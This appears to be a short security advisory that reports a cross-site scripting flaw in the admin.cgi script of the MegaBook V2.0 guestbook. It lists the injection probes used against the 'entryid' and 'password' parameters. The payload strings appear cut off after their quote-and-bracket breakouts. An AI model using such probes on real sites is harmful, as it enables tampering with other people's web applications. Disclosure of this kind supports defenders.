文章作者：SpyHat The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross SiteScripting, which will allow the attacker to modify the post in the guestbook. Theaffected scripts is admin.cgi URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi) I have tested the script with the following query: ?action=modifypost&entryid="> I have also tested the script with theses POST variables: action=modifypost&entryid=66&password= action=modifypost&entryid=66&password='> action=modifypost&entryid=66&password="> action=modifypost&entryid=66&password=> action=modifypost&entryid=66&password=